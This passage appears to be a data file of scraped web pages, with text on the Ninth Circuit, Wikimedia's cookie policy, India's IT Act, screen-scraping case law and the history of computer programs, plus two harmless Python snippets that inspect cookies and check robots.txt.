That is said to cause uncertainty in the district courts and within the bar. However, en banc review is a relatively rare occurrence in all circuits and Ninth Circuit rules provide for full en banc review in limited circumstances. 17 All recently proposed splits would leave at least one circuit with 21 judges, only two fewer than the 23 that the Ninth Circuit had when the limited en banc procedure was first adopted. In other words, after a split at least one of the circuits would still be using limited en banc courts. 18 In March 2007, Associate Justices Anthony Kennedy and Clarence Thomas testified before a House Appropriations subcommittee that the consensus among the justices of the Supreme Court of the United States was that the Ninth Circuit was too large and unwieldy and should be split. 19 Congressional officials, legislative commissions, and interest groups have all submitted proposals to divide the Ninth Circuit such as: The more recent proposals have aimed to redefine the Ninth Circuit to cover California, Hawaii, Guam, and the Northern Mariana Islands, and to create a new Twelfth Circuit to cover Alaska, Arizona, Idaho, Montana, Nevada, Oregon, and Washington. As of November 15, 2023 update : Chief judges have administrative responsibilities with respect to their circuits, and preside over any panel on which they serve, unless the circuit justice (the Supreme Court justice responsible for the circuit) is also on the panel. Unlike the Supreme Court, where one justice is specifically nominated to be chief, the office of chief judge rotates among the circuit judges. To be chief, a judge must have been in active service on the court for at least one year, be under the age of 65, and have not previously served as chief judge. A vacancy is filled by the judge highest in seniority among the group of qualified judges, with seniority determined first by commission date, then by age. The chief judge serves for a term of seven years, or until age 70, whichever occurs first. If no judge qualifies to be chief, the youngest judge over the age of 65 who has served on the court for at least one year shall act as chief until another judge qualifies. If no judge has served on the court for more than a year, the most senior judge shall act as chief. Judges can forfeit or resign their chief judgeship or acting chief judgeship while retaining their active status as a circuit judge. 27 When the office was created in 1948, the chief judge was the longest-serving judge who had not elected to retire, on what has since 1958 been known as senior status, or declined to serve as chief judge. After August 6, 1959, judges could not become or remain chief after turning 70 years old. The current rules have been in operation since October 1, 1982. 28 The court has 29 seats for active judges, numbered in the order in which they were initially filled. Judges who assume senior status enter a kind of retirement in which they remain on the bench but vacate their seats, thus allowing the U.S. President to appoint new judges to fill their seats. |
284 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. As stated in our Privacy Policy, Wikimedia believes strongly in the values of privacy and transparency. To that end, we have created this Cookie Statement as a clear reference guide to the use of cookies on Wikimedia Sites. This Cookie Statement explains how we use cookies (and other locally stored data technologies), how we use third-party cookies, and how you can manage your cookie options. For more information on our privacy practices, please visit our Privacy Policy. The Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, actively collects some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. A "cookie" is a tiny data file that we transfer onto your computer, mobile phone, or any other device that you use to access the Wikimedia Sites, and is generally used for authentication and tracking. Every cookie expires after a certain period of time, but that period varies depending on what the cookie is used for and how your browser is configured. Cookies are often categorized based on how long they remain active before they expire. A "session" cookie is one that generally expires when you close your web browser or mobile application. A "persistent" cookie is one that remains in your device, even after you close your browser or mobile application. A persistent cookie expires according to the duration set by us, or when you delete it manually. You can learn more about cookies on Wikipedia. You may remove or disable cookies through your browser settings. For more information on how to manage your cookie options, please see Section 3 of this Cookie Statement below. For more information on this and other key terms that may be relevant, please read through our Privacy Policy Glossary. Cookies are not required in order to read or edit the Wikimedia Sites. We use the information we receive from cookies and other locally stored data technologies to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and interactions with the Wikimedia Sites, and to generally improve our services. Cookies are required in order to login and for your edits to be associated to a user account; without cookies, your edits will be anonymous and unassociated with an account. We use cookies, JavaScript, tracking pixels, and other locally stored data technologies to accomplish different purposes. Below is a list of the categories of cookies we use and what they are used for. Functionality: These cookies help the Wikimedia Sites work and are essential in order to enable you to move around the Wikimedia site and use their features. These cookies are useful for remembering your username in the login field, maintaining your session and remembering previous actions, keeping you logged in (if selected), and more. Here are a few examples: wgCookiePrefix Token This affects the threshold for how many unsuccessful login attempts trigger a notification to the user. 
Preferences: These cookies store your preferences, so that they can be remembered the next time you use the Wikimedia Sites, for a more customized experience. These cookies are useful for recognizing and maintaining your language preference, remembering changes you have made to text size, fonts and other display preferences, so we can provide you with the look and feel that you want, and more. One example is a cookie named for the watchlist message it hides, where watchlistMessageId is the Id of the message being hidden. Performance and Analysis: These cookies count the number of visitors and collect information about how you use the Wikimedia Sites. This allows us to better understand your user experience on the Wikimedia Sites and helps us improve them for you and other users — for instance, by making sure users are finding what they need easily. Third-Party: We will never use third-party cookies on our wikis unless we get your permission to do so. These cookies would allow us to render services provided by third parties, such as "like" and "share" buttons. When a third party provides these kinds of services, they may require the use of a cookie in order to provide their services. If you ever come across a third-party cookie transferred to your device during your access of the Wikimedia wiki sites, where you did not take any action to authorize the use and/or transfer of that cookie (such as one that may have been mistakenly placed by another user or administrator), please report that cookie to us at privacy@wikimedia.org. A note about Wikimedia Foundation non-wiki sites: Some non-wiki Wikimedia Foundation sites are hosted by a third-party service provider. Sites hosted by WordPress VIP may have the WordPress Stats module enabled. Stats is a service that allows us to understand how many visitors we get to our WordPress-hosted non-wiki sites, their location by country, and which pages, posts and links are the most popular. Only the Wikimedia Foundation and the service provider, Automattic/WordPress, have access to the raw Stats data, which is retained for a maximum of 30 days. For more information about Stats, see WordPress' support page on the module. Sites hosted by Civilized Discourse Construction Kit, Inc., known as Discourse forums, use cookies for functionality purposes and to store preferences. Only the Wikimedia Foundation and the service provider have access to the raw data. For more information about the cookies and their retention periods, see Discourse's information about cookies. Please note that the Wikimedia Foundation has not configured its Discourse forums to use Google Analytics, serve advertisements, or process donations; Discourse cookies related to those purposes are not used in our Sites. While this is not a comprehensive list, below are some of the things that you can do to limit use of cookies and other locally stored data technologies on your device. While cookies and other locally stored data technologies may not be necessary to use our sites, some features may not function properly if you disable them. Turning off the browser's cookies will prevent tracking pixels from tracking your specific activity. A tracking pixel may still record an anonymous visit from your IP address, but unique information will not be recorded. If you do not want to receive tracking pixels, you will need to disable HTML images in your browser-based email client, and that may affect your ability to view images in other emails that you receive.
Please read through our Privacy Policy for more information. If you have any further questions, contact privacy@wikimedia.org. Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
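The Cookie Statement above distinguishes "session" cookies from "persistent" cookies. As a practical aside that is not part of the scraped source, the minimal sketch below uses the requests library already imported in this notebook to list the cookies a site sets and to label each one by that distinction; the target URL is only an example.

import requests  # already imported earlier in this notebook

def inspect_cookies(url="https://en.wikipedia.org/wiki/Web_scraping"):
    # List cookies returned by the server and classify each as session or persistent.
    try:
        session = requests.Session()
        session.get(url, timeout=10)
        for cookie in session.cookies:
            # cookie.expires is None for session cookies and a Unix timestamp
            # for persistent cookies.
            kind = "session" if cookie.expires is None else "persistent"
            print(f"{cookie.name} ({kind}), domain={cookie.domain}")
    except Exception as e:
        print(f"Failed to inspect cookies: {e}")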
285 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Information_Technology_Act,_2000#:~:text=From_Wikipedia,_the_free_encyclopedia_The_Information_Technology,in_India_dealing_with_cybercrime_and_electronic_commerce. | The Information Technology Act, 2000 (also known as ITA 2000, or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on 17 October 2000. It is the primary law in India dealing with cybercrime and electronic commerce. Secondary or subordinate legislation to the IT Act includes the Intermediary Guidelines Rules 2011 and the Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021. The bill was passed in the budget session of 2000 and signed by President K. R. Narayanan on 9 May 2000. The bill was finalised by a group of officials headed by the then Minister of Information Technology, Pramod Mahajan. 1 The original Act contained 94 sections, divided into 13 chapters and 4 schedules, out of which the third and fourth schedule were omitted later. The law applies to the whole of India. If a crime involves a computer or network located in India, persons of other nationalities can also be indicted under the law. 2 The Act provides a legal framework for electronic governance by giving recognition to electronic records and digital signatures. It also defines cyber crimes and prescribes penalties for them. The Act directed the formation of a Controller of Certifying Authorities to regulate the issuance of digital signatures. It also established a Cyber Appellate Tribunal to resolve disputes rising from this new law. 2 The Act also amended various sections of the Indian Penal Code, 1860, the Indian Evidence Act, 1872, the Banker's Books Evidence Act, 1891, and the Reserve Bank of India Act, 1934 to make them compliant with new technologies. 2 A major amendment was made in 2008. It introduced Section 66A which penalized sending "offensive messages". It also introduced Section 69, which gave authorities the power of "interception or monitoring or decryption of any information through any computer resource". Additionally, it introduced provisions addressing pornography, child porn, cyber terrorism and voyeurism. The amendment was passed on 22 December 2008 without any debate in Lok Sabha. The next day, it was passed by the Rajya Sabha. It was signed into law by the then President Pratibha Patil, on 5 February 2009. 3 4 5 6 Following is a list of offences and the corresponding penalties under the 2000 Act: 7 8 From its establishment as an amendment to the original act in 2008, Section 66A attracted controversy over its unconstitutional nature: In December 2012, P Rajeev, a Rajya Sabha member from Kerala, tried to pass a resolution seeking to amend Section 66A. He was supported by D. Bandyopadhyay, Gyan Prakash Pilania, Basavaraj Patil Sedam, Narendra Kumar Kashyap, Rama Chandra Khuntia and Baishnab Charan Parida. P Rajeev pointed out that the cartoons and editorials allowed in the traditional media were being censored in the new media. He also said that the law was barely debated before being passed in December 2008. 27 Rajeev Chandrasekhar suggested that 66A should only apply to person-to-person communication pointing to a similar section under the Indian Post Office Act, 1898. Shantaram Naik opposed any changes, saying that the misuse of law was insufficient to warrant changes. 
The then Minister for Communications and Information Technology, Mr Kapil Sibal, defended the existing law, saying that similar laws existed in the US and the UK. He also said that a similar provision existed under the Indian Post Office Act, 1898. However, P Rajeev said that the UK law dealt only with communication from person to person. 27 In November 2012, IPS officer Amitabh Thakur and his wife, social activist Nutan Thakur, filed a petition in the Lucknow bench of the Allahabad High Court claiming that Section 66A violated the freedom of speech guaranteed under Article 19(1)(a) of the Constitution of India. They said that the section was vaguely worded and frequently misused. 28 Also in November 2012, a Delhi-based law student, Shreya Singhal, filed a Public Interest Litigation (PIL) in the Supreme Court of India. She argued that Section 66A was vaguely phrased, and as a result, it violated Article 14, 19 (1)(a) and Article 21 of the Constitution. The PIL was accepted on 29 November 2012. 29 30 In August 2014, the Supreme Court asked the central government to respond to petitions filed by the Internet and Mobile Association of India (IAMAI) which claimed that the IT Act gave the government power to arbitrarily remove user-generated content. 31 On 24 March 2015, the Supreme Court of India gave the verdict that Section 66A is unconstitutional in entirety. 32 The court said that Section 66A of IT Act 2000 "arbitrarily, excessively and disproportionately invades the right of free speech" provided under Article 19(1) of the Constitution of India. But the Court turned down a plea to strike down sections 69A and 79 of the Act, which deal with the procedure and safeguards for blocking certain websites. 33 34 Despite this, as per a research paper by Abhinav Sekhri and Apar Gupta, Section 66A of the Information Technology Act 2000 continues to be used by police departments across India in prosecutions. 35 The data privacy rules introduced in the Act in 2011 have been described as too strict by some Indian and US firms. The rules require firms to obtain written permission from customers before collecting and using their personal data. This has affected US firms which outsource to Indian companies. However, some companies have welcomed the strict rules, saying it will remove fears of outsourcing to Indian companies. 36 Section 69 allows intercepting any information and ask for information decryption. To refuse decryption is an offence. The Indian Telegraph Act, 1885 allows the government to tap phones. But according to a 1996 Supreme Court verdict, the government can tap phones only in case of a "public emergency". But there is no such restriction on Section 69. 4 On 20 December 2018, the Ministry of Home Affairs cited Section 69 in the issue of an order authorising ten central agencies to intercept, monitor, and decrypt “any information generated, transmitted, received or stored in any computer. 37 While some claim this to be a violation of the fundamental right to privacy, the Ministry of Home Affairs has claimed its validity on the grounds of national security. 38 39 The bans on Chinese apps based on Section 69A has been criticized for possibly being in conflict with Article 19(1)(a) of the Constitution of India ensuring freedom of speech and expression to all, as well as possibly in conflict with WTO agreements. 40 41 The Internet Freedom Foundation has criticized the ban for not following the required protocols and thus lacking transparency and disclosure. 
42 On 2 April 2015, the then Chief Minister of Maharashtra, Devendra Fadnavis, revealed to the state assembly that a new law was being framed to replace the repealed Section 66A. Fadnavis was replying to a query by Shiv Sena leader Neelam Gorhe. Gorhe had said that the repeal of the law would encourage online miscreants and asked whether the state government would frame a law in this regard. Fadnavis said that the previous law had resulted in no convictions, so the law would be framed such that it would be strong and result in convictions. 43 On 13 April 2015, it was announced that the Ministry of Home Affairs would form a committee of officials from the Intelligence Bureau, Central Bureau of Investigation, National Investigation Agency, Delhi Police and the ministry itself to produce a new legal framework. This step was reportedly taken after complaints from intelligence agencies that they were no longer able to counter online posts that involved national security matters or incited people to commit an offence, such as online recruitment for ISIS. 44 45 Former Minister of State with the Ministry of Information Technology, Milind Deora, has supported a new "unambiguous section to replace 66A". 46 In 2022, it was reported 47 that there had been a proposal to replace the Information Technology Act with a more comprehensive and updated Digital India Act, which would cover a wider range of information technology issues and concerns. This law could ostensibly have focal areas around privacy, social media regulation, regulation of over-the-top platforms, internet intermediaries, introducing additional contraventions or offences, and governance of new technologies. 48 The Indian government closely connects data to citizens' privacy, and this is demonstrated when Shiv Shankar Singh states, "Each person must be able to exercise a substantial degree of control over that data and its use. Data protection is a legal safeguard to prevent misuse of information about an individual person on a medium including computers." 49 The Information Technology (Intermediary Guidelines and Digital Media Ethics Code) Rules, 2021 supersedes India's Intermediary Guidelines Rules 2011. 50 |
286 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20110211123854/http://library.findlaw.com/2003/Jul/29/132944.html | By Kenneth A. Adler The courts continue to wrestle with how to map existing law onto the shifting terrain of computer technology. And, it appears that new controversies are arising faster than judicial consensus can form. One of the latest controversies surrounds "screen scraping," a process by which a software program simulates a user's interaction with a Web site to access information stored on that site. A screen scraper can not only enter the information a human user would; it can also capture the Web site's replies. This facility may include the ability to extract substantial portions of data stored on the site — and therein lies the beginning of the controversy. Many users welcome scrapers. Scrapers can permit a user to enter certain information once, such as usernames and passwords, and with the push of a button, send the scraper software off to access various third-party Web sites to which the user subscribes, automatically input the appropriate information and retrieve the desired information from those sites. This relieves the user from having to endure the tedium of individually accessing each Web site, and manually and serially entering in repetitive information. Controversy arises, however, when commercial entities use scraping software to collect substantial amounts of information from their competitors' Web sites, even when the information is provided to the public and is readily obtainable by manual means by individual inquiry. Several courts have addressed a company's use of related technologies such as "spiders," "robots," and "Web crawlers" to gather information from a competitor's Web site. Notably, many of these decisions have relied upon the law of trespass in determining whether such access is actionable. Compare, e.g., Ticketmaster Corp. v. Tickets.Com, Inc., 2000 U.S. Dist. LEXIS 12987, 18 (C.D.Calif. Aug. 10, 2000), aff'd 248 F.3d 1173 (9th Cir. 2001) (finding that a trespass claim based upon Web crawling had "some merit" but not enough to justify the issuance of a preliminary injunction), with eBay, Inc. v. Bidder's Edge, Inc., 100 F.Supp.2d 1058 (N.D. Calif. 2000) (finding that a Web crawler's generation of 80,000 to 100,000 requests a day to a Web site constituted a trespass to chattels) and Oyster Software v. Forms Processing, 2001 U.S. Dist. LEXIS 22520 (N.D. Calif. Dec. 6, 2001) (although Web crawlers placed only a "negligible" load on a Web site's servers, no more than mere "use" of a plaintiff's computer system was necessary to establish a trespass claim). Two recent decisions, one in the U.S. Court of Appeals for the First Circuit and another in a trial court in Texas, squarely address claims against screen scraping activity. However, the issue is presented under different legal theories in each case. The First Circuit analyzes screen scraping under the Computer Fraud and Abuse Act (CFAA), 18 U.S.C. 1030 (2000), while the Texas court, like those in the cases cited above, rests its decision on the law of trespass. Computer Fraud and Abuse Act The first of these recent screen scraping decisions is that of the First Circuit in EF Cultural Travel BV v. Zefer Corp., 318 F.3d 58 (1st Cir. Jan. 28, 2003) (EF II). (The court's earlier treatment of the subject appears in the related case, EF Cultural Travel BV v. Explorica, Inc., 274 F.3d 577 (1st Cir., Dec. 17, 2001) or EF I, as discussed below.)
The facts underlying both EF cases involve a dispute between EF Cultural Travel (EF) and defendant Explorica, Inc., competitors in the student travel industry. Importantly, Explorica was founded by several of EF's former employees. Explorica contracted with Zefer Corporation to design and code a software program that would scrape EF's pricing information from the EF Web site and download it into an automated spreadsheet. Based on this information, Explorica set off to compete with EF by setting its own prices, on average, 5 percent lower. Altogether, Zefer ran the scraper twice (comprising more than 30,000 interrogations of the EF Web site), to collect 2000 and 2001 tour prices, collecting approximately 60,000 lines of data. EF sued Zefer and Explorica in federal court, seeking a preliminary injunction on the grounds of copyright infringement and under the Computer Fraud and Abuse Act. The district court refused to grant summary judgment on the copyright claim, but issued a preliminary injunction on the basis of the CFAA, because the scraper software exceeded the "reasonable expectations" of authorized access of ordinary users of the EF Web site. The district court reasoned that the scraping activities exceeded the defendants' authorized use of the EF Web site because "access was facilitated by use of confidential information about certain codes used on the EF Web site that would permit the screen scraper to function more effectively obtained in violation of the broad confidentiality agreement signed by EF's former employees." Specifically, the district court relied on 18 U.S.C. 1030(a)(4). "Exceeds authorized access," as defined by the CFAA, means "to access a computer with authorization and to use such access to obtain or alter information in the computer that the accessing party is not entitled so to obtain or alter." 18 U.S.C. 1030(e)(6). The district court concluded that a lack of authorization need not be explicit, and observed that EF's Web site included not fewer than three warnings that should have put the defendants on notice about reasonable use of the EF Web site — the copyright notice on the EF home page with a link provided to permit contacting the company with user questions; the provision of confidential codes by Explorica to Zefer; and the fact that the Web site functioned to permit typical users to display the information one page at a time. On appeal, the First Circuit, in its first decision in the case (274 F.3d 577, EF I), addressed only the preliminary injunction as it applied to Explorica (Zefer was by then in bankruptcy proceedings, and its appeal was automatically stayed). The court relied on the broad confidentiality agreement between the former EF employees who now operated Explorica to conclude that their breach of the agreement exceeded "authorized access." Further, the court rejected Explorica's contention that EF should not be permitted to sustain its private cause of action because EF could not demonstrate that Explorica's actions had caused the "damage or loss" required by the CFAA. The court agreed that EF could not meet the CFAA's standard for "damage," i.e., "impairment to the integrity or availability of data, a program, a system or information that…causes loss aggregating at least $5,000 in value during any one year period to one or more individuals…" 18 U.S.C. 1030(e)(8). However, the court concluded that EF had sustained possibly compensable "losses."
Although "loss" is not defined by the statute, the court noted that a reasonable definition of "loss" could include lost business, loss of goodwill, and the cost of diagnostic and remedial measures taken by EF after it discovered the scraping. The court held that EF unquestionably suffered a detriment and a disadvantage…. Congress’ use of the disjunctive damage or loss, confirms that it anticipated recovery in cases involving other than purely physical damage. The appeals court in EF I concluded that EF would likely succeed on the merits on its CFAA claim, and upheld the district court’s injunction. The court did not, however, address related arguments concerning whether mere use of scraper software constituted unauthorized access under the statute. Upon lifting of the automatic stay resulting from its bankruptcy proceedings, Zefer appealed the validity of the injunction as applied to it. The First Circuit, after reviewing the findings of its earlier decision, noted that the evidence before it concerning Zefer’s knowledge of the confidential nature of the information provided by Explorica was inconclusive and that, in any event, the same information could have been obtained by Zefer through a manual examination of the EF Web site. The court focused once more on whether the use of the scraper software had exceeded authorized access under the CFAA. However, the court rejected the district court’s "reasonable expectations" standard for determining what conduct constituted "unauthorized access" under the CFAA where no express limits on access exist. Instead, the court observed, …we think that the public website provider can easily spell out explicitly what is forbidden and, consonantly, that nothing justifies putting users at the mercy of a highly imprecise, litigationspawning standard like reasonable expectations. If EF wants to ban scrapers, let it say so…. The court concluded with some cogent advice for Web site operators: W ith rare exceptions, public website providers ought to say just what nonpassword protected access they purport to forbid. The opinion strongly suggests, although it does not hold, that a clear statement by a Web site provider that scraping is unauthorized will give rise to a cause of action under the CFAA. Trespass In contrast with the approach taken by the First Circuit in the EF decisions, a recent Texas court relied on a finding of NEW YORK LAW JOURNAL MONDAY, JUNE 9, 2003 trespass in issuing a temporary injunction against screen scraping by a commercial party. Like the First Circuit, the Texas court focused on the existence of Web site terms and conditions, but in this case prohibited such use. In American Airlines, Inc. v. Farechase, Inc., No. 167 194022 02 (67th District Court, Texas March 8, 2003) the district court issued a temporary injunction against Farechase, Inc. (Farechase) prohibiting it from the sale or distribution of its Web automation software. (A copy of the injunction is available at http: www.eff.org Cases AA v Farechase 20030310 prelim inj.pdf.) The software, also a type of screen scraper, was designed to access American Airlines’ Web site (AA.com), and automatically seek out and aggregate American Airlines’ flight, seat availability and pricing information, including fares available only through AA.com and not generally available for commercial purposes. Farechase had marketed the software to commercial users, travel distribution centers and travel agents. 
American Airlines (AA) repeatedly notified Farechase to cease and desist from scraping AA.com and distributing software designed to access and scrape data from AA.com. In response, rather than ceasing its scraping activities, Farechase revised its software to include a "masking" feature that permitted the software to disguise itself to prevent detection by AA. AA argued that Farechase violated AA.com's terms of service by accessing the fare and flight information for commercial purposes, thus, as the court noted, "frustrating American's objectives and efforts in developing and maintaining AA.com." The court classified Farechase's actions as "intentional," "without authorization," and interfering with AA's possessory interest in its computer system. The court concluded, "Farechase's conduct intermeddles with and interferes with American's personal property. Such conduct constitutes a trespass" that substantially interfered with the airline's "efforts to reduce the cost of distribution of its airline tickets." Interestingly, the court also found that the unauthorized access "may be a violation" of Section 33.02 of the Texas Penal Code (criminalizing a breach of computer security). In its decision, the court held that Farechase's actions had directly harmed AA, causing it to endure losses with respect to the capacity and operation of its computer systems, lost or reduced customer goodwill and lost opportunities for gaining and increasing customer goodwill through the reduced fares available via the AA.com site. In addition, the court found that Farechase's scraping activities increased AA's expenses and "adversely affected and harmed American and the condition, quality and value of American's property." Finally, the court observed, Farechase had announced plans for wider distribution of the software, which the court said "imminently threatens to adversely impact and harm the performance of AA.com and to place additional burdens on American's website infrastructure." Based on its findings, the court enjoined Farechase from its scraping activities. Sufficient Notice Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial Web sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled, and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the Web site owner's system and the types and manner of prohibitions on such conduct. While the law in this area becomes more settled, entities contemplating using scraping programs to access a public Web site should consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. Owners of Web sites should consider adding or revising appropriate terms of use to their sites while clearly specifying how their Web site content can be displayed, accessed and used by site visitors, as well as any prohibitions on such access and use. However, it is important to note that merely adding prohibitive language to a Web site's terms of use in and of itself may be insufficient. In Specht v. Netscape Communications Corporation, Inc., 306 F.3d 17 (2d Cir. Oct. 1, 2002), the U.S.
Court of Appeals for the Second Circuit refused to enforce an arbitration provision inserted in the end user license agreement for a free software "plug-in." Because no "immediately visible notice of the existence of the license terms" was displayed prior to the downloading or during the software installation process, the court found that "a reference to the existence of the license terms on a submerged screen was not sufficient to place consumers on inquiry or constructive notice of those terms." Therefore, the court reasoned, simply downloading the software could not constitute acceptance of the license terms. As such, merely providing access to the terms of use may not provide sufficient notice to users to be binding upon them. Therefore, it would be prudent for Web site owners wanting to bind their users to terms of use to either require assent by use of a click-wrap agreement requiring a click-through of an "I Agree" button or other means to ensure that the terms of use and modifications to such terms are available to the user prior to use, and are conspicuously placed on the site. Donald R. Ballman, an associate in the firm's Hartford, Conn., office, assisted in the preparation of this article. This article is reprinted with permission from the June 9, 2003 edition of the NEW YORK LAW JOURNAL. © 2003 ALM Properties, Inc. All rights reserved. Further duplication without permission is prohibited. For information, contact American Lawyer Media, Reprint Department, at 800 888 8300 x6111. |
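The article above closes by advising anyone contemplating scraping to check whether the access is authorized, for example by reviewing a site's terms of use and notices. The sketch below is not from the source; it shows one related automated courtesy check — consulting a site's robots.txt with Python's standard urllib.robotparser — which can complement, but does not replace, reading the terms of use. The example URL and user-agent string are illustrative assumptions.

from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

def allowed_to_fetch(page_url, user_agent="example-research-bot"):
    # Download and parse the site's robots.txt, then ask whether this
    # user agent may fetch the given page.
    parser = RobotFileParser()
    parser.set_url(urljoin(page_url, "/robots.txt"))
    try:
        parser.read()
    except Exception as e:
        print(f"Could not read robots.txt: {e}")
        return False  # conservative default when the file cannot be read
    return parser.can_fetch(user_agent, page_url)

# Example usage:
# print(allowed_to_fetch("https://en.wikipedia.org/wiki/Web_scraping"))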
287 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_program | A computer program is a sequence or set of instructions in a programming language for a computer to execute. It is one component of software, which also includes documentation and other intangible components. 1 A computer program in its human-readable form is called source code. Source code needs another computer program to execute because computers can only execute their native machine instructions. Therefore, source code may be translated to machine instructions using a compiler written for the language. (Assembly language programs are translated using an assembler.) The resulting file is called an executable. Alternatively, source code may execute within an interpreter written for the language. 2 If the executable is requested for execution, then the operating system loads it into memory and starts a process. 3 The central processing unit will soon switch to this process so it can fetch, decode, and then execute each machine instruction. 4 If the source code is requested for execution, then the operating system loads the corresponding interpreter into memory and starts a process. The interpreter then loads the source code into memory to translate and execute each statement. Running the source code is slower than running an executable. 5 b Moreover, the interpreter must be installed on the computer. The "Hello, World!" program is used to illustrate a language's basic syntax. The syntax of the language BASIC (1964) was intentionally limited to make the language easy to learn. 6 For example, variables are not declared before being used. 7 Also, variables are automatically initialized to zero. 7 Here is an example computer program, in Basic, to average a list of numbers: 8 Once the mechanics of basic computer programming are learned, more sophisticated and powerful languages are available to build large computer systems. 9 Improvements in software development are the result of improvements in computer hardware. At each stage in hardware's history, the task of computer programming changed dramatically. In 1837, Jacquard's loom inspired Charles Babbage to attempt to build the Analytical Engine. 10 The names of the components of the calculating device were borrowed from the textile industry. In the textile industry, yarn was brought from the store to be milled. The device had a store which consisted of memory to hold 1,000 numbers of 50 decimal digits each. 11 Numbers from the store were transferred to the mill for processing. It was programmed using two sets of perforated cards. One set directed the operation and the other set inputted the variables. 10 12 However, the thousands of cogged wheels and gears never fully worked together. 13 Ada Lovelace worked for Charles Babbage to create a description of the Analytical Engine (1843). 14 The description contained Note G which completely detailed a method for calculating Bernoulli numbers using the Analytical Engine. This note is recognized by some historians as the world's first computer program. 13 In 1936, Alan Turing introduced the Universal Turing machine, a theoretical device that can model every computation. 15 It is a finite-state machine that has an infinitely long read/write tape. The machine can move the tape back and forth, changing its contents as it performs an algorithm. The machine starts in the initial state, goes through a sequence of steps, and halts when it encounters the halt state.
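The passage above mentions an example program, in BASIC, that averages a list of numbers, but the listing itself did not survive the scrape. Purely as an illustration — written in Python, the language used elsewhere in this notebook, rather than the article's BASIC — here is an equivalent:

def average(numbers):
    # Sum the values, then divide by the count; return 0 for an empty list.
    total = 0
    for value in numbers:
        total += value
    return total / len(numbers) if numbers else 0

print(average([10, 20, 30, 40]))  # prints 25.0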
16 All present-day computers are Turing complete. 17 The Electronic Numerical Integrator And Computer (ENIAC) was built between July 1943 and Fall 1945. It was a Turing complete, general-purpose computer that used 17,468 vacuum tubes to create the circuits. At its core, it was a series of Pascalines wired together. 18 Its 40 units weighed 30 tons, occupied 1,800 square feet (167 m2), and consumed $650 per hour (in 1940s currency) in electricity when idle. 18 It had 20 base 10 accumulators. Programming the ENIAC took up to two months. 18 Three function tables were on wheels and needed to be rolled to fixed function panels. Function tables were connected to function panels by plugging heavy black cables into plugboards. Each function table had 728 rotating knobs. Programming the ENIAC also involved setting some of the 3,000 switches. Debugging a program took a week. 19 It ran from 1947 until 1955 at Aberdeen Proving Ground, calculating hydrogen bomb parameters, predicting weather patterns, and producing firing tables to aim artillery guns. 20 Instead of plugging in cords and turning switches, a stored-program computer loads its instructions into memory just like it loads its data into memory. 21 As a result, the computer could be programmed quickly and perform calculations at very fast speeds. 22 Presper Eckert and John Mauchly built the ENIAC. The two engineers introduced the stored-program concept in a three-page memo dated February 1944. 23 Later, in September 1944, John von Neumann began working on the ENIAC project. On June 30, 1945, von Neumann published the First Draft of a Report on the EDVAC, which equated the structures of the computer with the structures of the human brain. 22 The design became known as the von Neumann architecture. The architecture was simultaneously deployed in the constructions of the EDVAC and EDSAC computers in 1949. 24 The IBM System 360 (1964) was a family of computers, each having the same instruction set architecture. The Model 20 was the smallest and least expensive. Customers could upgrade and retain the same application software. 25 The Model 195 was the most premium. Each System 360 model featured multiprogramming 25 —having multiple processes in memory at once. When one process was waiting for input output, another could compute. IBM planned for each model to be programmed using PL 1. 26 A committee was formed that included COBOL, Fortran and ALGOL programmers. The purpose was to develop a language that was comprehensive, easy to use, extendible, and would replace Cobol and Fortran. 26 The result was a large and complex language that took a long time to compile. 27 Computers manufactured until the 1970s had front-panel switches for manual programming. 28 The computer program was written on paper for reference. An instruction was represented by a configuration of on off settings. After setting the configuration, an execute button was pressed. This process was then repeated. Computer programs also were automatically inputted via paper tape, punched cards or magnetic-tape. After the medium was loaded, the starting address was set via switches, and the execute button was pressed. 28 A major milestone in software development was the invention of the Very Large Scale Integration (VLSI) circuit (1964). 29 Following World War II, tube-based technology was replaced with point-contact transistors (1947) and bipolar junction transistors (late 1950s) mounted on a circuit board. 
29 During the 1960s, the aerospace industry replaced the circuit board with an integrated circuit chip. 29 Robert Noyce, co-founder of Fairchild Semiconductor (1957) and Intel (1968), achieved a technological improvement to refine the production of field-effect transistors (1963). 30 The goal is to alter the electrical resistivity and conductivity of a semiconductor junction. First, naturally occurring silicate minerals are converted into polysilicon rods using the Siemens process. 31 The Czochralski process then converts the rods into a monocrystalline silicon, boule crystal. 32 The crystal is then thinly sliced to form a wafer substrate. The planar process of photolithography then integrates unipolar transistors, capacitors, diodes, and resistors onto the wafer to build a matrix of metal oxide semiconductor (MOS) transistors. 33 34 The MOS transistor is the primary component in integrated circuit chips. 30 Originally, integrated circuit chips had their function set during manufacturing. During the 1960s, controlling the electrical flow migrated to programming a matrix of read-only memory (ROM). The matrix resembled a two-dimensional array of fuses. 29 The process to embed instructions onto the matrix was to burn out the unneeded connections. 29 There were so many connections, firmware programmers wrote a computer program on another chip to oversee the burning. 29 The technology became known as Programmable ROM. In 1971, Intel installed the computer program onto the chip and named it the Intel 4004 microprocessor. 35 The terms microprocessor and central processing unit (CPU) are now used interchangeably. However, CPUs predate microprocessors. For example, the IBM System 360 (1964) had a CPU made from circuit boards containing discrete components on ceramic substrates. 36 The Intel 4004 (1971) was a 4 bit microprocessor designed to run the Busicom calculator. Five months after its release, Intel released the Intel 8008, an 8 bit microprocessor. Bill Pentz led a team at Sacramento State to build the first microcomputer using the Intel 8008: the Sac State 8008 (1972). 37 